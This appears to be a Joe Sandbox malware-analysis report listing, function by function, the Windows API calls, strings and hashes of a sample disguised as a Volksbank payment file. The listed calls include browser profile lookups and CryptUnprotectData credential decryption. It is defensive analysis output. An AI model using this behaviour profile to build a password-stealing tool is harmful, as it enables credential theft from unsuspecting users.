• Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
• Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
APIs
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalLock.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
• GlobalUnlock.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
• CloseClipboard.USER32 ref: 004098D7
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
• String ID:
• API String ID: 1213725291-0
• Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
• Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
• Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
• Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
APIs
• GetLastError.KERNEL32 ref: 004182D7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
• FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
• LocalFree.KERNEL32(?), ref: 00418342
• free.MSVCRT ref: 00418370
  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7693DF80,?,0041755F,?), ref: 00417452
  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
• String ID: OsError 0x%x (%u)
• API String ID: 2360000266-2664311388
• Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
• Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
• Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
• Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
APIs
  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
• OpenClipboard.USER32(?), ref: 00411878
• GetLastError.KERNEL32 ref: 0041188D
• DeleteFileW.KERNEL32(?), ref: 004118AC
  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
  • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
  • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
• String ID:
• API String ID: 2633007058-0
• Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
• Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
• Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
• Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
APIs
• _wcsicmp.MSVCRT ref: 004022A6
• _wcsicmp.MSVCRT ref: 004022D7
• _wcsicmp.MSVCRT ref: 00402305
• _wcsicmp.MSVCRT ref: 00402333
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• memset.MSVCRT ref: 0040265F
• memcpy.MSVCRT(?,?,00000011), ref: 0040269B
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
• memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 2929817778-1134094380
                                                                                                                                                                                                                                          • Opcode ID: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                                                                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
• String ID: :stringdata$ftp://$http://$https://
• API String ID: 2787044678-1921111777
• Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
• Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
• Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
• Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
• Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
• Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
• Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
• Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetDlgItem.USER32(?,000003EA), ref: 00413239
• SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
• {Unknown}, xrefs: 004132A6
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
• Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
• Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
• Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
• Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 829165378-0
                                                                                                                                                                                                                                          • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                                          • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                                          • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                                          • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                                          • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                                                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: wcscat$_snwprintfmemset$wcscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 3143752011-1996832678
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
• GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
• GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
• GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
• GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
• GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
• API String ID: 667068680-2887671607
APIs
Strings
Similarity
• API ID: _snwprintfmemset$wcscpy$wcscat
• String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
• API String ID: 1607361635-601624466
APIs
Strings
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 2000436516-3842416460
APIs
  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
• GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
• LoadIconW.USER32(00000000,00000072), ref: 004035CA
• GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
• LoadIconW.USER32(00000000,00000074), ref: 004035E4
• GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
• LoadIconW.USER32(00000000,00000073), ref: 004035F8
• GetModuleHandleW.KERNEL32(00000000), ref: 00403607
• LoadIconW.USER32(00000000,00000075), ref: 0040360C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
• LoadIconW.USER32(00000000,0000006F), ref: 00403620
• GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
• LoadIconW.USER32(00000000,00000076), ref: 00403634
• GetModuleHandleW.KERNEL32(00000000), ref: 00403643
• LoadIconW.USER32(00000000,00000077), ref: 00403648
• GetModuleHandleW.KERNEL32(00000000), ref: 00403657
• LoadIconW.USER32(00000000,00000070), ref: 0040365C
• GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
• LoadIconW.USER32(00000000,00000078), ref: 00403670
Similarity
• API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1043902810-0
                                                                                                                                                                                                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
